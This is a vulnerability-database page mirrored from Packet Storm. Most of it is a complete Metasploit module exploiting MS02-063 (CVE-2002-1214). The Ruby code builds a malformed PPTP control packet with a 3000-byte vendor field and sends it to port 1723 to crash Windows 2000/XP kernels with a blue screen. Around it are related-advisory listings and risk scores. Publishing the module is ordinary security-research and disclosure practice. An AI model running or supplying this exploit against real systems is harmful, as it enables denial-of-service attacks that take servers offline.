Vulners
Lucene search
MS02-063 PPTP Malformed Control Data Kernel Denial of Service
🗓️ 31 Aug 2024 00:00:00Reported by aushack, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 209 Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2002-1214 | 29 May 201815:50 | – | circl |
 | Microsoft Windows PPTP Service Buffer Overflow - Ver2 (CVE-2002-1214) | 28 Dec 201400:00 | – | checkpoint_advisories |
 | CVE-2002-1214 | 1 Sep 200404:00 | – | cve |
 | CVE-2002-1214 | 1 Sep 200404:00 | – | cvelist |
 | MS02-063 PPTP Malformed Control Data Kernel Denial of Service | 3 Jul 200901:24 | – | metasploit |
 | CVE-2002-1214 | 28 Oct 200205:00 | – | nvd |
 | Unchecked Buffer in PPTP Implementation Could Enable DOS Attacks (Q329834) | 3 Nov 200500:00 | – | openvas |
| Unchecked Buffer in PPTP Implementation Could Enable DOS Attacks (Q329834) | 3 Nov 200500:00 | – | openvas |
 | MS02-063: Unchecked Buffer in PPTP Implementation Could Enable DOS Attacks (329834) | 28 Nov 200200:00 | – | nessus |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'MS02-063 PPTP Malformed Control Data Kernel Denial of Service',
'Description' => %q{
This module exploits a kernel based overflow when sending abnormal PPTP Control Data
packets to Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers
(Remote Access Services). Kernel memory is overwritten resulting in a BSOD.
Code execution may be possible however this module is only a DoS.
},
'Author' => [ 'aushack' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '5807' ],
[ 'CVE', '2002-1214' ],
[ 'OSVDB', '13422' ],
[ 'MSB', 'MS02-063' ],
],
'DisclosureDate' => '2002-09-26'))
register_options(
[
Opt::RPORT(1723),
])
end
def run
connect
# Fields borrowed from Wireshark :)
sploit = "\x00\x9c" # length
sploit << "\x00\x01" # control message
sploit << "\x1a\x2b\x3c\x4d" # cookie
sploit << "\x00\x01" # start control connection req
sploit << "\x00\x00" # reserved
sploit << "\x01\x00" # protocol version
sploit << "\x00\x00" # reserved
sploit << "\x00\x03" # framing capabilities
sploit << "\x00\x00\x00\x02" # bearer capabilities
sploit << "\xff\xff" # max channels
sploit << "\x0a\x28" # firmware revision
sploit << "\x00\x01" # Hostname
sploit << "A" * 3000 # Vendor - trigger vuln
print_status("Sending PPTP DoS Packet...")
sock.put(sploit)
print_status("Packet sent. Kernel should halt on a Stop Error (BSOD).")
disconnect
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 27.5
EPSS0.75525